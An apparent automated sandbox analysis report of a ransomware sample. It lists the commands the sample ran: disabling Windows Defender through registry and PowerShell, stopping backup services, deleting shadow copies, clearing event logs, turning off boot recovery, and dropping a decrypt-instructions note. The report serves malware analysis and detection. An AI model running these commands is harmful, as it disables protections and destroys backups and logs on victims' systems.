Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1400 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 2036 wrote to memory of 1160 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2036 wrote to memory of 1160 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2036 wrote to memory of 1160 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 696 wrote to memory of 1224 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 696 wrote to memory of 1224 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 696 wrote to memory of 1224 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1252 wrote to memory of 764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1252 wrote to memory of 764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1252 wrote to memory of 764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 816 wrote to memory of 1544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 816 wrote to memory of 1544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 816 wrote to memory of 1544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1952 wrote to memory of 740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1952 wrote to memory of 740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1952 wrote to memory of 740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 956 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 956 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 956 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1404 wrote to memory of 1560 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1404 wrote to memory of 1560 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1404 wrote to memory of 1560 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1804 wrote to memory of 1168 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1168 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1168 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/2036-54-0x0000000000000000-mapping.dmp

memory/1160-55-0x0000000000000000-mapping.dmp

memory/696-56-0x0000000000000000-mapping.dmp

memory/1224-57-0x0000000000000000-mapping.dmp

memory/1252-58-0x0000000000000000-mapping.dmp

memory/764-59-0x0000000000000000-mapping.dmp

memory/816-60-0x0000000000000000-mapping.dmp

memory/1544-61-0x0000000000000000-mapping.dmp

memory/1952-62-0x0000000000000000-mapping.dmp

memory/740-63-0x0000000000000000-mapping.dmp

memory/956-64-0x0000000000000000-mapping.dmp

memory/960-65-0x0000000000000000-mapping.dmp

memory/1404-66-0x0000000000000000-mapping.dmp

memory/1560-67-0x0000000000000000-mapping.dmp

memory/1804-68-0x0000000000000000-mapping.dmp

memory/1168-69-0x0000000000000000-mapping.dmp

memory/992-70-0x0000000000000000-mapping.dmp

memory/952-71-0x0000000000000000-mapping.dmp

memory/1776-72-0x0000000000000000-mapping.dmp

memory/1956-73-0x0000000000000000-mapping.dmp

memory/1704-74-0x0000000000000000-mapping.dmp

memory/1352-75-0x0000000000000000-mapping.dmp

memory/1192-76-0x0000000000000000-mapping.dmp

memory/916-77-0x0000000000000000-mapping.dmp

memory/1732-78-0x0000000000000000-mapping.dmp

memory/1584-79-0x0000000000000000-mapping.dmp

memory/532-80-0x0000000000000000-mapping.dmp

memory/1160-81-0x0000000000000000-mapping.dmp

memory/1372-82-0x0000000000000000-mapping.dmp

memory/1832-83-0x0000000000000000-mapping.dmp

memory/1100-84-0x0000000000000000-mapping.dmp

memory/1460-85-0x0000000000000000-mapping.dmp

memory/736-86-0x0000000000000000-mapping.dmp

memory/1040-87-0x0000000000000000-mapping.dmp

memory/1836-88-0x0000000000000000-mapping.dmp

memory/1104-89-0x0000000000000000-mapping.dmp

memory/1624-90-0x0000000000000000-mapping.dmp

memory/1772-91-0x0000000000000000-mapping.dmp

memory/1920-92-0x0000000000000000-mapping.dmp

memory/1380-93-0x0000000000000000-mapping.dmp

memory/1900-94-0x0000000000000000-mapping.dmp

memory/892-95-0x0000000000000000-mapping.dmp

memory/1604-96-0x0000000000000000-mapping.dmp

memory/1384-97-0x0000000000000000-mapping.dmp

memory/1652-98-0x0000000000000000-mapping.dmp

memory/680-99-0x0000000000000000-mapping.dmp

memory/728-100-0x0000000000000000-mapping.dmp

memory/1588-101-0x0000000000000000-mapping.dmp

memory/2044-102-0x0000000000000000-mapping.dmp

memory/1284-103-0x0000000000000000-mapping.dmp

memory/2000-104-0x0000000000000000-mapping.dmp

memory/776-105-0x0000000000000000-mapping.dmp

memory/1312-106-0x0000000000000000-mapping.dmp

memory/1716-107-0x0000000000000000-mapping.dmp

memory/1608-108-0x0000000000000000-mapping.dmp

memory/520-109-0x0000000000000000-mapping.dmp

memory/1572-110-0x0000000000000000-mapping.dmp

memory/1324-111-0x0000000000000000-mapping.dmp

memory/1708-112-0x0000000000000000-mapping.dmp

memory/1708-113-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

memory/884-114-0x0000000000000000-mapping.dmp

memory/1612-116-0x0000000000000000-mapping.dmp

memory/1476-118-0x0000000000000000-mapping.dmp

memory/972-119-0x0000000000000000-mapping.dmp

memory/660-120-0x0000000000000000-mapping.dmp

memory/1156-123-0x00000000025D0000-0x00000000025D2000-memory.dmp

memory/1156-124-0x00000000025D2000-0x00000000025D4000-memory.dmp

memory/1156-125-0x00000000025D4000-0x00000000025D7000-memory.dmp

memory/1156-122-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

memory/1156-126-0x00000000025DB000-0x00000000025FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0b3d25fb685158a43d4a56861a448756
SHA1 1eb3e477363f853566f5086128a369f25862aa3a
SHA256 23b030291621f64706be3337f51b643ce70b8f7b3adeb39e9850d6449510f303
SHA512 d3abc5607676f125fed3d0b4325606c32afed05196af2064734245736e065e966493f307e25e4f6be7fcc1684423e12f4864ef32dcdbcc442aaba357dcbdb670

memory/1064-129-0x000007FEF2AB0000-0x000007FEF360D000-memory.dmp

memory/1064-131-0x00000000026A0000-0x00000000026A2000-memory.dmp

memory/1064-132-0x00000000026A2000-0x00000000026A4000-memory.dmp

memory/1064-133-0x00000000026A4000-0x00000000026A7000-memory.dmp

memory/1064-130-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/1064-134-0x00000000026AB000-0x00000000026CA000-memory.dmp

C:\vyS2_HOW_TO_DECRYPT.txt

MD5 ee121b1deb962e44600cf271791ebd82
SHA1 1c5b22c8856b15843ac236159b558e1fdca8dc04
SHA256 34ed6223e7de680957e45d9fbf0117506a2820990380a279a1272465f49ee811
SHA512 f5136d2bd9e539af874aff551b600d760b3867ad88c250fafe5a2e1f10eb0a673a115710d43074649ede4f5c6401be3aa7fdce70fd4c777a8aa7ebb83af31d4a

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:51

Reported

2022-01-12 16:56

Platform

win10-en-20211208

Max time kernel

119s

Max time network

209s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandReceive.raw => C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File renamed C:\Users\Admin\Pictures\DenyRegister.crw => C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87__wC6eB5YWEE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-16_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Spider\ResPacks\gameplayspider.respack C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.winmd C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
